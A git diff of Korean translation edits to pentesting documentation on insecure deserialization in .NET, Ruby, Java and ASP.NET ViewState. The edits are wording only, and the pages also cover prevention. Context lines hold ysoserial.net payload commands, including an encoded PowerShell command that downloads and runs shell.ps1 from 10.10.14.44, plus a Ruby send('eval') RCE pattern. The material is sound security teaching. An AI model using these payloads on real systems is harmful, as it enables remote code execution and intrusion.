-- `--sf xml`는 **가젯**(`-g`)을 지정할 수 있으며, ysoserial.net은 "xml"을 포함하는 포맷터를 검색합니다 (대소문자 구분 없음).
+- `--sf xml`는 **가젯을 지정**(`-g`)할 수 있으며, ysoserial.net은 "xml"을 포함하는 포맷터를 검색합니다(대소문자 구분 없음).
 
-**ysoserial 예시**로 악용을 생성하는 방법:
+**ysoserial 예제**를 통해 악용을 생성합니다:
 ```bash
 #Send ping
 ysoserial.exe -g ObjectDataProvider -f Json.Net -c "ping -n 5 10.10.14.44" -o base64
@@ -679,7 +679,7 @@ echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.44/shell.
 ysoserial.exe -g ObjectDataProvider -f Json.Net -c "powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADQANAAvAHMAaABlAGwAbAAuAHAAcwAxACcAKQA=" -o base64
 ```
 **ysoserial.net**에는 각 익스플로잇이 어떻게 작동하는지 더 잘 이해하는 데 도움이 되는 **매우 흥미로운 매개변수**가 있습니다: `--test`\
-이 매개변수를 지정하면 **ysoserial.net**이 **로컬에서 익스플로잇을 시도**하므로 페이로드가 제대로 작동하는지 테스트할 수 있습니다.\
+이 매개변수를 지정하면 **ysoserial.net**이 **로컬에서 익스플로잇을 시도**하므로 페이로드가 올바르게 작동하는지 테스트할 수 있습니다.\
 이 매개변수는 유용한데, 코드를 검토하면 다음과 같은 코드 조각을 찾을 수 있습니다 (from [ObjectDataProviderGenerator.cs](https://github.com/pwntester/ysoserial.net/blob/c53bd83a45fb17eae60ecc82f7147b5c04b07e42/ysoserial/Generators/ObjectDataProviderGenerator.cs#L208)):
 ```java
 if (inputArgs.Test)
@@ -705,39 +705,39 @@ TypeNameHandling = TypeNameHandling.Auto
 return obj;
 }
 ```
-In the **이전 코드는 생성된 익스플로잇에 취약합니다**. 따라서 .Net 애플리케이션에서 유사한 것을 발견하면 해당 애플리케이션도 취약할 가능성이 높습니다.\
-따라서 **`--test`** 매개변수는 **어떤 코드 조각이** **ysoserial.net**이 생성할 수 있는 역직렬화 익스플로잇에 취약한지 이해하는 데 도움이 됩니다.
+**이전 코드는 생성된 익스플로잇에 취약합니다**. 따라서 .Net 애플리케이션에서 유사한 것을 발견하면 해당 애플리케이션도 취약할 가능성이 높습니다.\
+따라서 **`--test`** 매개변수는 **어떤 코드 조각이** **ysoserial.net**이 생성할 수 있는 역직렬화 익스플로잇에 취약한지를 이해하는 데 도움이 됩니다.
 
 ### ViewState
 
-[**.Net의 \_\_ViewState 매개변수를 악용하는 방법**](exploiting-__viewstate-parameter.md)에 대해 살펴보세요. **임의의 코드를 실행하기 위해.** 만약 **희생자 머신에서 사용된 비밀을 이미 알고 있다면**, [**코드를 실행하는 방법을 알아보려면 이 게시물을 읽으세요**](exploiting-__viewstate-knowing-the-secret.md)**.**
+[**.Net의 \_\_ViewState 매개변수를 악용하는 방법에 대한 이 POST를 확인하세요**](exploiting-__viewstate-parameter.md) **임의 코드를 실행하기 위해.** 만약 **희생자 머신에서 사용된 비밀을 이미 알고 있다면**, [**코드를 실행하는 방법을 알아보려면 이 포스트를 읽으세요**](exploiting-__viewstate-knowing-the-secret.md)**.**
 
-### Prevention
+### 예방
 
 .Net에서 역직렬화와 관련된 위험을 완화하기 위해:
 
-- **데이터 스트림이 객체 유형을 정의하도록 허용하지 마십시오.** 가능할 경우 `DataContractSerializer` 또는 `XmlSerializer`를 사용하십시오.
+- **데이터 스트림이 객체 유형을 정의하도록 허용하지 마십시오.** 가능한 경우 `DataContractSerializer` 또는 `XmlSerializer`를 사용하십시오.
 - **`JSON.Net`의 경우 `TypeNameHandling`을 `None`으로 설정하십시오:** %%%TypeNameHandling = TypeNameHandling.None%%%
 - **`JavaScriptSerializer`와 `JavaScriptTypeResolver`의 사용을 피하십시오.**
 - **역직렬화할 수 있는 유형을 제한하십시오**, `System.IO.FileInfo`와 같은 .Net 유형의 고유한 위험을 이해하십시오. 이는 서버 파일의 속성을 수정할 수 있어 서비스 거부 공격으로 이어질 수 있습니다.
 - **위험한 속성을 가진 유형에 주의하십시오**, `Value` 속성이 있는 `System.ComponentModel.DataAnnotations.ValidationException`과 같이 악용될 수 있습니다.
-- **타입 인스턴스화를 안전하게 제어하여** 공격자가 역직렬화 프로세스에 영향을 미치지 않도록 하십시오. 이로 인해 `DataContractSerializer` 또는 `XmlSerializer`조차도 취약해질 수 있습니다.
+- **타입 인스턴스화를 안전하게 제어하십시오**. 공격자가 역직렬화 프로세스에 영향을 미치지 않도록 하여 `DataContractSerializer` 또는 `XmlSerializer`조차도 취약하게 만들 수 있습니다.
 - **`BinaryFormatter` 및 `JSON.Net`에 대해 사용자 정의 `SerializationBinder`를 사용하여 화이트리스트 제어를 구현하십시오.**
-- **.Net 내에서 알려진 불안전한 역직렬화 가젯에 대한 정보를 유지하고** 역직렬화기가 이러한 유형을 인스턴스화하지 않도록 하십시오.
-- **잠재적으로 위험한 코드를** 인터넷에 접근할 수 있는 코드와 분리하여 `System.Windows.Data.ObjectDataProvider`와 같은 알려진 가젯을 신뢰할 수 없는 데이터 소스에 노출되지 않도록 하십시오.
+- **.Net 내에서 알려진 불안전한 역직렬화 가젯에 대한 정보를 유지하고** 역직렬화기가 그러한 유형을 인스턴스화하지 않도록 하십시오.
+- **잠재적으로 위험한 코드를 인터넷에 접근할 수 있는 코드와 격리하여** `System.Windows.Data.ObjectDataProvider`와 같은 알려진 가젯을 신뢰할 수 없는 데이터 소스에 노출되지 않도록 하십시오.
 
-### **References**
+### **참고문헌**
 
-- Java와 .Net JSON 역직렬화 **논문:** [**https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf**](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)**,** 강연: [https://www.youtube.com/watch?v=oUAeWhW5b8c](https://www.youtube.com/watch?v=oUAeWhW5b8c) 및 슬라이드: [https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
+- Java 및 .Net JSON 역직렬화 **논문:** [**https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf**](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf)**,** 강연: [https://www.youtube.com/watch?v=oUAeWhW5b8c](https://www.youtube.com/watch?v=oUAeWhW5b8c) 및 슬라이드: [https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf)
 - [https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html#net-csharp](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html#net-csharp)
 - [https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf](https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf)
 - [https://www.slideshare.net/MSbluehat/dangerous-contents-securing-net-deserialization](https://www.slideshare.net/MSbluehat/dangerous-contents-securing-net-deserialization)
 
-## **Ruby**
+## **루비**
 
-루비에서 직렬화는 **marshal** 라이브러리 내의 두 가지 메서드에 의해 수행됩니다. 첫 번째 메서드는 **dump**로 알려져 있으며, 객체를 바이트 스트림으로 변환하는 데 사용됩니다. 이 과정을 직렬화라고 합니다. 반대로 두 번째 메서드인 **load**는 바이트 스트림을 다시 객체로 되돌리는 데 사용되며, 이 과정을 역직렬화라고 합니다.
+루비에서 직렬화는 **marshal** 라이브러리 내의 두 가지 메서드에 의해 수행됩니다. 첫 번째 메서드는 **dump**로, 객체를 바이트 스트림으로 변환하는 데 사용됩니다. 이 과정을 직렬화라고 합니다. 반대로 두 번째 메서드인 **load**는 바이트 스트림을 다시 객체로 되돌리는 데 사용되며, 이를 역직렬화라고 합니다.
 
-직렬화된 객체를 보호하기 위해 **루비는 HMAC (Hash-Based Message Authentication Code)**를 사용하여 데이터의 무결성과 진위를 보장합니다. 이 목적을 위해 사용되는 키는 여러 가능한 위치 중 하나에 저장됩니다:
+직렬화된 객체를 보호하기 위해 **루비는 HMAC (Hash-Based Message Authentication Code)**를 사용하여 데이터의 무결성과 진위를 보장합니다. 이를 위해 사용되는 키는 여러 가능한 위치 중 하나에 저장됩니다:
 
 - `config/environment.rb`
 - `config/initializers/secret_token.rb`
@@ -815,18 +815,18 @@ require "base64"
 puts "Payload (Base64 encoded):"
 puts Base64.encode64(payload)
 ```
-다른 RCE 체인으로 Ruby On Rails를 이용한 공격: [https://codeclimate.com/blog/rails-remote-code-execution-vulnerability-explained/](https://codeclimate.com/blog/rails-remote-code-execution-vulnerability-explained/)
+다른 RCE 체인으로 Ruby On Rails를 이용하는 방법: [https://codeclimate.com/blog/rails-remote-code-execution-vulnerability-explained/](https://codeclimate.com/blog/rails-remote-code-execution-vulnerability-explained/)
 
 ### Ruby .send() 메서드
 
-[**이 취약점 보고서**](https://starlabs.sg/blog/2024/04-sending-myself-github-com-environment-variables-and-ghes-shell/)에서 설명된 바와 같이, 일부 사용자로부터 비위생적인 입력이 ruby 객체의 `.send()` 메서드에 도달하면, 이 메서드는 객체의 **다른 메서드를 호출**할 수 있게 해줍니다. 
+[**이 취약점 보고서**](https://starlabs.sg/blog/2024/04-sending-myself-github-com-environment-variables-and-ghes-shell/)에서 설명된 바와 같이, 일부 사용자로부터 비정제된 입력이 ruby 객체의 `.send()` 메서드에 도달하면, 이 메서드는 객체의 **다른 메서드를 호출**할 수 있게 해줍니다.
 
 예를 들어, eval을 호출하고 두 번째 매개변수로 ruby 코드를 전달하면 임의의 코드를 실행할 수 있습니다:
 ```ruby
 <Object>.send('eval', '<user input with Ruby code>') == RCE
 ```
-또한, **`.send()`**의 매개변수 중 하나만 공격자에 의해 제어된다면, 이전 글에서 언급한 바와 같이 **인수가 필요 없는** 객체의 모든 메서드나 **기본값이 있는** 인수를 가진 메서드를 호출할 수 있습니다.\
-이를 위해, 해당 요구 사항을 충족하는 **흥미로운 메서드**를 찾기 위해 객체의 모든 메서드를 열거할 수 있습니다.
+또한, **`.send()`**의 매개변수 중 하나만 공격자에 의해 제어된다면, 이전 글에서 언급한 바와 같이, **인수가 필요 없는** 객체의 모든 메서드나 **기본값**이 있는 인수를 가진 메서드를 호출할 수 있습니다.\
+이를 위해, **그 요구 사항을 충족하는 흥미로운 메서드를 찾기 위해** 객체의 모든 메서드를 열거할 수 있습니다.
 ```ruby
 <Object>.send('<user_input>')
 
@@ -854,7 +854,7 @@ candidate_methods.length() # Final number of methods=> 3595
 
 ### Ruby _json 오염
 
-해시 가능하지 않은 배열과 같은 값을 본문에 보내면 `_json`이라는 새로운 키에 추가됩니다. 그러나 공격자는 본문에 자신이 원하는 임의의 값으로 `_json`이라는 값을 설정할 수도 있습니다. 그런 다음, 예를 들어 백엔드가 매개변수의 진위를 확인하지만 `_json` 매개변수를 사용하여 어떤 작업을 수행하는 경우, 권한 우회를 수행할 수 있습니다.
+해시 가능하지 않은 배열과 같은 값을 본문에 보내면 `_json`이라는 새로운 키에 추가됩니다. 그러나 공격자는 본문에 임의의 값을 가진 `_json`이라는 값을 설정할 수도 있습니다. 그런 다음, 예를 들어 백엔드가 매개변수의 진위를 확인하지만 `_json` 매개변수를 사용하여 어떤 작업을 수행하면 권한 우회가 발생할 수 있습니다.
 
 [Ruby _json 오염 페이지에서 더 많은 정보를 확인하세요](ruby-_json-pollution.md).
 
@@ -864,7 +864,7 @@ candidate_methods.length() # Final number of methods=> 3595
 
 객체를 직렬화하는 데 사용할 수 있는 다른 Ruby 라이브러리가 있으며, 따라서 불안전한 역직렬화 중에 RCE를 얻기 위해 악용될 수 있습니다. 다음 표는 이러한 라이브러리 중 일부와 역직렬화될 때 로드된 라이브러리에서 호출되는 메서드를 보여줍니다(기본적으로 RCE를 얻기 위해 악용할 함수):
 
-<table data-header-hidden><thead><tr><th width="179"></th><th width="146"></th><th></th></tr></thead><tbody><tr><td><strong>라이브러리</strong></td><td><strong>입력 데이터</strong></td><td><strong>클래스 내에서 시작하는 메서드</strong></td></tr><tr><td>Marshal (Ruby)</td><td>Binary</td><td><code>_load</code></td></tr><tr><td>Oj</td><td>JSON</td><td><code>hash</code> (클래스는 해시(맵)의 키로 넣어야 함)</td></tr><tr><td>Ox</td><td>XML</td><td><code>hash</code> (클래스는 해시(맵)의 키로 넣어야 함)</td></tr><tr><td>Psych (Ruby)</td><td>YAML</td><td><code>hash</code> (클래스는 해시(맵)의 키로 넣어야 함)<br><code>init_with</code></td></tr><tr><td>JSON (Ruby)</td><td>JSON</td><td><code>json_create</code> ([하단의 json_create에 대한 노트 참조](#table-vulnerable-sinks))</td></tr></tbody></table>
+<table data-header-hidden><thead><tr><th width="179"></th><th width="146"></th><th></th></tr></thead><tbody><tr><td><strong>라이브러리</strong></td><td><strong>입력 데이터</strong></td><td><strong>클래스 내에서 시작하는 메서드</strong></td></tr><tr><td>Marshal (Ruby)</td><td>Binary</td><td><code>_load</code></td></tr><tr><td>Oj</td><td>JSON</td><td><code>hash</code> (클래스는 해시(맵)의 키로 넣어야 함)</td></tr><tr><td>Ox</td><td>XML</td><td><code>hash</code> (클래스는 해시(맵)의 키로 넣어야 함)</td></tr><tr><td>Psych (Ruby)</td><td>YAML</td><td><code>hash</code> (클래스는 해시(맵)의 키로 넣어야 함)<br><code>init_with</code></td></tr><tr><td>JSON (Ruby)</td><td>JSON</td><td><code>json_create</code> ([json_create에 대한 주석은 끝에서 확인하세요](#table-vulnerable-sinks))</td></tr></tbody></table>
 
 기본 예:
 ```ruby
diff --git a/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md b/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
index 3fad41832..fe1ed94c8 100644
--- a/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
+++ b/src/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
@@ -7,32 +7,32 @@
 ## ObjectDataProvider Gadget
 
 문서에서: _ObjectDataProvider 클래스는 바인딩 소스로 사용할 수 있는 객체를 래핑하고 생성합니다._\
-네, 이상한 설명이니, 이 클래스가 왜 그렇게 흥미로운지 살펴보겠습니다: 이 클래스는 **임의의 객체를 래핑**하고, _**MethodParameters**_를 사용하여 **임의의 매개변수를 설정**한 다음, **MethodName을 사용하여 임의의 객체의 임의의 함수를 호출**할 수 있게 해줍니다.\
-따라서 임의의 **객체**는 **역직렬화되는 동안 매개변수와 함께 **함수를 실행**합니다.**
+네, 이상한 설명이니, 이 클래스가 왜 그렇게 흥미로운지 살펴보겠습니다: 이 클래스는 **임의의 객체를 래핑**하고, _**MethodParameters**_를 사용하여 **임의의 매개변수를 설정**한 다음, **MethodName을 사용하여 임의의 함수**를 호출할 수 있게 해줍니다.\
+따라서 임의의 **객체**는 **역직렬화되는 동안 매개변수와 함께** **함수를 실행**하게 됩니다.
 
 ### **이것이 어떻게 가능한가**
 
 **System.Windows.Data** 네임스페이스는 `C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF`에 있는 **PresentationFramework.dll** 내에서 정의되고 구현됩니다.
 
-[**dnSpy**](https://github.com/0xd4d/dnSpy)를 사용하면 관심 있는 클래스의 **코드를 검사**할 수 있습니다. 아래 이미지에서 우리는 **PresentationFramework.dll --> System.Windows.Data --> ObjectDataProvider --> Method name**의 코드를 보고 있습니다.
+[**dnSpy**](https://github.com/0xd4d/dnSpy)를 사용하면 우리가 관심 있는 클래스의 **코드를 검사**할 수 있습니다. 아래 이미지에서 **PresentationFramework.dll --> System.Windows.Data --> ObjectDataProvider --> Method name**의 코드를 보고 있습니다.
 
 ![](<../../images/image (427).png>)
 
-`MethodName`이 설정되면 `base.Refresh()`가 호출되는 것을 관찰할 수 있습니다. 그것이 무엇을 하는지 살펴보겠습니다:
+`MethodName`이 설정되면 `base.Refresh()`가 호출되는 것을 볼 수 있습니다. 이게 무엇을 하는지 살펴보겠습니다:
 
 ![](<../../images/image (319).png>)
 
-좋습니다, `this.BeginQuery()`가 무엇을 하는지 계속 살펴보겠습니다. `BeginQuery`는 `ObjectDataProvider`에 의해 재정의되며, 이것이 수행하는 작업은 다음과 같습니다:
+좋습니다, 이제 `this.BeginQuery()`가 무엇을 하는지 계속 살펴보겠습니다. `BeginQuery`는 `ObjectDataProvider`에 의해 재정의되며, 이것이 수행하는 작업은 다음과 같습니다:
 
 ![](<../../images/image (345).png>)
 
-코드 끝부분에서 `this.QueryWorke(null)`를 호출하고 있다는 점에 유의하세요. 그것이 무엇을 실행하는지 살펴보겠습니다:
+코드 끝부분에서 `this.QueryWorke(null)`를 호출하고 있다는 점에 유의하세요. 이것이 무엇을 실행하는지 살펴보겠습니다:
 
 ![](<../../images/image (596).png>)
 
-이것은 `QueryWorker` 함수의 전체 코드는 아니지만, 흥미로운 부분을 보여줍니다: 코드 **`this.InvokeMethodOnInstance(out ex);`를 호출합니다.** 이것이 **메서드 세트가 호출되는** 라인입니다.
+이것은 `QueryWorker` 함수의 전체 코드는 아니지만, 흥미로운 부분을 보여줍니다: 코드 **`this.InvokeMethodOnInstance(out ex);`를 호출합니다.** 이것이 **메서드 집합이 호출되는** 라인입니다.
 
-단순히 _**MethodName**_\*\*을 설정하는 것만으로도 실행될 것임을 확인하고 싶다면, 이 코드를 실행할 수 있습니다:
+단순히 _**MethodName**_을 설정하는 것만으로도 **실행될 것**임을 확인하고 싶다면, 이 코드를 실행할 수 있습니다:
 ```java
 using System.Windows.Data;
 using System.Diagnostics;
@@ -52,14 +52,14 @@ myODP.MethodName = "Start";
 }
 }
 ```
-_C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll_를 참조로 추가해야 `System.Windows.Data`를 로드할 수 있습니다.
+다음과 같이 참조를 추가해야 합니다: _C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll_ 를 추가해야 `System.Windows.Data`를 로드할 수 있습니다.
 
 ## ExpandedWrapper
 
-이전의 익스플로잇을 사용하면 **객체**가 _**ObjectDataProvider**_ 인스턴스로 **역직렬화될** 경우가 있습니다(예: DotNetNuke 취약점에서 XmlSerializer를 사용하여 객체가 `GetType`을 사용하여 역직렬화됨). 그러면 _ObjectDataProvider_ 인스턴스에 래핑된 객체 유형에 대한 **정보가 없습니다**(예: `Process`). DotNetNuke 취약점에 대한 더 많은 [정보는 여기에서 확인할 수 있습니다](https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=https%3A%2F%2Fpaper.seebug.org%2F365%2F&sandbox=1).
+이전의 익스플로잇을 사용하면 **객체**가 _**ObjectDataProvider**_ 인스턴스로 **역직렬화될** 경우가 있습니다 (예: DotNetNuke 취약점에서 XmlSerializer를 사용하여 객체가 `GetType`을 사용하여 역직렬화됨). 그러면 _ObjectDataProvider_ 인스턴스에 래핑된 객체 유형에 대한 **정보가 없습니다** (예: `Process`). DotNetNuke 취약점에 대한 더 많은 [정보는 여기에서 확인할 수 있습니다](https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=https%3A%2F%2Fpaper.seebug.org%2F365%2F&sandbox=1).
 
-이 클래스는 주어진 인스턴스에 캡슐화된 객체의 **객체 유형을 지정할 수 있도록** 합니다. 따라서 이 클래스는 소스 객체(_ObjectDataProvider_)를 새로운 객체 유형으로 캡슐화하고 필요한 속성(_ObjectDataProvider.MethodName_ 및 _ObjectDataProvider.MethodParameters_)을 제공하는 데 사용할 수 있습니다.\
-이는 앞서 제시된 경우와 같이 매우 유용합니다. 왜냐하면 우리는 **\_ObjectDataProvider**_\*\*를 \*\*_**ExpandedWrapper** \_ 인스턴스 안에 **래핑**할 수 있고, **역직렬화될** 때 이 클래스는 _**OjectDataProvider**_ 객체를 **생성**하여 _**MethodName**_에 지정된 **함수**를 **실행**할 것입니다.
+이 클래스는 주어진 인스턴스에 캡슐화된 객체의 **객체 유형을 지정할 수 있도록** 합니다. 따라서 이 클래스는 소스 객체 (_ObjectDataProvider_)를 새로운 객체 유형으로 캡슐화하고 우리가 필요한 속성 (_ObjectDataProvider.MethodName_ 및 _ObjectDataProvider.MethodParameters_)을 제공하는 데 사용할 수 있습니다.\
+이는 앞서 제시된 경우와 같이 매우 유용합니다. 왜냐하면 우리는 **\_ObjectDataProvider**_\*\*를 \*\*_**ExpandedWrapper** \_ 인스턴스 안에 **래핑**할 수 있고 **역직렬화될 때** 이 클래스는 _**OjectDataProvider**_ 객체를 **생성**하여 _**MethodName**_에 지정된 **함수**를 **실행**할 것입니다.
 
 다음 코드를 사용하여 이 래퍼를 확인할 수 있습니다:
 ```java
@@ -85,11 +85,11 @@ myExpWrap.ProjectedProperty0.MethodName = "Start";
 ```
 ## Json.Net
 
-[공식 웹 페이지](https://www.newtonsoft.com/json)에서는 이 라이브러리가 **Json.NET의 강력한 JSON 직렬 변환기를 사용하여 모든 .NET 객체를 직렬화 및 역직렬화할 수 있도록 한다**고 명시되어 있습니다. 따라서 **ObjectDataProvider 가젯을 역직렬화**할 수 있다면, 객체를 역직렬화하는 것만으로 **RCE**를 유발할 수 있습니다.
+[공식 웹 페이지](https://www.newtonsoft.com/json)에서는 이 라이브러리가 **Json.NET의 강력한 JSON 직렬 변환기를 사용하여 모든 .NET 객체를 직렬화 및 역직렬화할 수 있도록 한다**고 명시되어 있습니다. 따라서 **ObjectDataProvider 가젯을 역직렬화**할 수 있다면, 객체를 역직렬화하는 것만으로도 **RCE**를 유발할 수 있습니다.
 
 ### Json.Net 예제
 
-우선 이 라이브러리를 사용하여 객체를 **직렬화/역직렬화**하는 방법에 대한 예제를 살펴보겠습니다:
+먼저 이 라이브러리를 사용하여 객체를 **직렬화/역직렬화**하는 방법에 대한 예제를 살펴보겠습니다:
 ```java
 using System;
 using Newtonsoft.Json;
diff --git a/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md b/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md
index 335fabd8e..50ebf6f13 100644
--- a/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md
+++ b/src/pentesting-web/deserialization/basic-java-deserialization-objectinputstream-readobject.md
@@ -4,7 +4,7 @@
 
 # Serializable
 
-Java `Serializable` 인터페이스(`java.io.Serializable`는 클래스가 **직렬화** 및 **역직렬화**되기 위해 구현해야 하는 마커 인터페이스입니다. Java 객체 직렬화(쓰기)는 [ObjectOutputStream](http://tutorials.jenkov.com/java-io/objectoutputstream.html)으로 수행되며, 역직렬화(읽기)는 [ObjectInputStream](http://tutorials.jenkov.com/java-io/objectinputstream.html)으로 수행됩니다.
+Java `Serializable` 인터페이스(`java.io.Serializable`는 클래스가 **직렬화** 및 **역직렬화**되려면 구현해야 하는 마커 인터페이스입니다. Java 객체 직렬화(쓰기)는 [ObjectOutputStream](http://tutorials.jenkov.com/java-io/objectoutputstream.html)으로 수행되며, 역직렬화(읽기)는 [ObjectInputStream](http://tutorials.jenkov.com/java-io/objectinputstream.html)으로 수행됩니다.
 
 **직렬화 가능한** **Person 클래스**의 예를 살펴보겠습니다. 이 클래스는 **readObject** 함수를 **재정의**하므로, 이 **클래스**의 **어떤 객체**가 **역직렬화**될 때 이 **함수**가 **실행**됩니다.\
 예제에서 Person 클래스의 **readObject 함수**는 그의 애완동물의 `eat()` 함수를 호출하고, Dog의 `eat()` 함수는 (어떤 이유로) **calc.exe**를 호출합니다. **이 계산기를 실행하기 위해 Person 객체를 직렬화하고 역직렬화하는 방법을 살펴보겠습니다:**
diff --git a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
index 2c1856ef3..bc85300d7 100644
--- a/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
+++ b/src/pentesting-web/deserialization/exploiting-__viewstate-parameter.md
@@ -4,7 +4,7 @@
 
 ## What is ViewState
 
-**ViewState**는 ASP.NET에서 웹 페이지 간에 페이지 및 컨트롤 데이터를 유지하는 기본 메커니즘으로 작용합니다. 페이지의 HTML이 렌더링되는 동안, 페이지의 현재 상태와 포스트백 중에 보존할 값들이 base64로 인코딩된 문자열로 직렬화됩니다. 이러한 문자열은 숨겨진 ViewState 필드에 배치됩니다.
+**ViewState**는 ASP.NET에서 웹 페이지 간에 페이지 및 컨트롤 데이터를 유지하는 기본 메커니즘 역할을 합니다. 페이지의 HTML이 렌더링되는 동안, 페이지의 현재 상태와 포스트백 중에 보존할 값들이 base64로 인코딩된 문자열로 직렬화됩니다. 이러한 문자열은 숨겨진 ViewState 필드에 배치됩니다.
 
 ViewState 정보는 다음 속성 또는 그 조합으로 특징지을 수 있습니다:
 
@@ -17,12 +17,12 @@ ViewState 정보는 다음 속성 또는 그 조합으로 특징지을 수 있
 
 ## Test Cases
 
-이미지는 .NET 프레임워크 버전에 따라 ASP.NET에서 ViewState의 다양한 구성에 대한 표입니다. 내용 요약은 다음과 같습니다:
+이미지는 .NET 프레임워크 버전에 따라 ASP.NET에서 ViewState의 다양한 구성에 대한 세부 정보를 담고 있는 표입니다. 내용 요약은 다음과 같습니다:
 
-1. **모든 .NET 버전**에 대해, MAC과 Encryption이 모두 비활성화되면 MachineKey가 필요하지 않으며, 따라서 이를 식별할 수 있는 방법이 없습니다.
-2. **4.5 미만 버전**의 경우, MAC이 활성화되었지만 Encryption이 비활성화된 경우 MachineKey가 필요합니다. MachineKey를 식별하는 방법은 "Blacklist3r"로 언급됩니다.
-3. **4.5 미만 버전**의 경우, MAC이 활성화되었든 비활성화되었든 관계없이 Encryption이 활성화되면 MachineKey가 필요합니다. MachineKey를 식별하는 것은 "Blacklist3r - Future Development"의 작업입니다.
-4. **4.5 이상 버전**의 경우, MAC과 Encryption의 모든 조합(둘 다 true이거나 하나는 true이고 다른 하나는 false인 경우)은 MachineKey가 필요합니다. MachineKey는 "Blacklist3r"를 사용하여 식별할 수 있습니다.
+1. **모든 .NET 버전**에 대해, MAC과 암호화가 모두 비활성화된 경우, MachineKey가 필요하지 않으며, 따라서 이를 식별할 수 있는 방법이 없습니다.
+2. **4.5 미만 버전**의 경우, MAC이 활성화되었지만 암호화가 비활성화된 경우, MachineKey가 필요합니다. MachineKey를 식별하는 방법은 "Blacklist3r"로 언급됩니다.
+3. **4.5 미만 버전**의 경우, MAC이 활성화되었든 비활성화되었든 관계없이, 암호화가 활성화된 경우 MachineKey가 필요합니다. MachineKey를 식별하는 것은 "Blacklist3r - Future Development"의 작업입니다.
+4. **4.5 이상 버전**의 경우, MAC과 암호화의 모든 조합(둘 다 true이거나 하나는 true이고 다른 하나는 false인 경우)은 MachineKey를 필요로 합니다. MachineKey는 "Blacklist3r"를 사용하여 식별할 수 있습니다.
 
 ### Test Case: 1 – EnableViewStateMac=false and viewStateEncryptionMode=false
 
@@ -39,8 +39,8 @@ ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "power
 ### Test case 1.5 – Test case 1과 같지만 ViewState 쿠키가 서버에 의해 전송되지 않음
 
 개발자는 **ViewState**가 HTTP 요청의 일부가 되지 않도록 할 수 있습니다 (사용자는 이 쿠키를 받지 않음).\
-**ViewState**가 **존재하지 않으면** 그들의 구현이 **ViewState 역직렬화로 인한 잠재적 취약점**으로부터 **안전하다**고 가정할 수 있습니다.\
-하지만 그렇지 않습니다. 요청 본문에 **ViewState 매개변수**를 추가하고 ysoserial을 사용하여 생성한 직렬화된 페이로드를 전송하면 여전히 **코드 실행**을 달성할 수 있습니다, **Case 1**에서 보여준 것처럼.
+**ViewState**가 **존재하지 않으면** 그들의 구현이 **ViewState 역직렬화로 인한 잠재적 취약점으로부터 안전하다**고 가정할 수 있습니다.\
+하지만 그렇지 않습니다. 요청 본문에 **ViewState 매개변수**를 추가하고 ysoserial을 사용하여 생성한 직렬화된 페이로드를 전송하면 여전히 **코드 실행**을 달성할 수 있습니다. 이는 **Case 1**에서 보여줍니다.
 
 ### Test Case: 2 – .Net < 4.5 및 EnableViewStateMac=true & ViewStateEncryptionMode=false
 
@@ -68,7 +68,7 @@ AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0M
 --encrypteddata : __VIEWSTATE parameter value of the target application
 --modifier : __VIWESTATEGENERATOR parameter value
 ```
-[**Badsecrets**](https://github.com/blacklanternsecurity/badsecrets)는 알려진 machineKeys를 식별할 수 있는 또 다른 도구입니다. Python으로 작성되었기 때문에 Blacklist3r와 달리 Windows 의존성이 없습니다. .NET viewstates의 경우 "python blacklist3r" 유틸리티가 있으며, 이는 사용하기 가장 빠른 방법입니다.
+[**Badsecrets**](https://github.com/blacklanternsecurity/badsecrets)는 알려진 machineKeys를 식별할 수 있는 또 다른 도구입니다. Python으로 작성되었기 때문에 Blacklist3r와 달리 Windows 의존성이 없습니다. .NET viewstate의 경우, "python blacklist3r" 유틸리티가 있으며, 이는 사용하기 가장 빠른 방법입니다.
 
 viewstate와 generator를 직접 제공할 수 있습니다:
 ```
